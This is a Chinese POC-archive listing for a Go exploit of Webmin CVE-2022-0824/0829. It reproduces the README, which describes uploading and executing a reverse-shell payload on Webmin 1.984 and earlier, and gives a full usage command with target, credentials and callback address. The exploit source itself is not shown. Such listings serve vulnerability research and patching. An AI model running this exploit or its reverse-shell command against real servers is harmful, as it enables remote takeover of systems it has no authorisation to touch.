关联漏洞
描述
Exploit POC for CVE-2022-0824
介绍
# golang-webmin-CVE-2022-0824-revshell
RCE in Webmin <= 1.984
CVE-2022-0824 and CVE-2022-0829
This exploits a BAC vuln in Webmin to upload a malicious file,
change the permissions on the file, and execute the file. The file,
created in the makePayload function, is a reverse shell back to an
attacker controlled server.
## Usage
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> target url\
c -> creds for webmin\
sl -> your local server IP and port to host your payload\
s -> callback ip\
p -> callback port
## References
https://www.webmin.com/security.html \
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ \
https://nvd.nist.gov/vuln/detail/CVE-2022-0824
文件快照
[4.0K] /data/pocs/6f17a0736df7a97155d79756a17c01235ee5f530
├── [6.0K] cve-2022-0824.go
└── [ 767] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。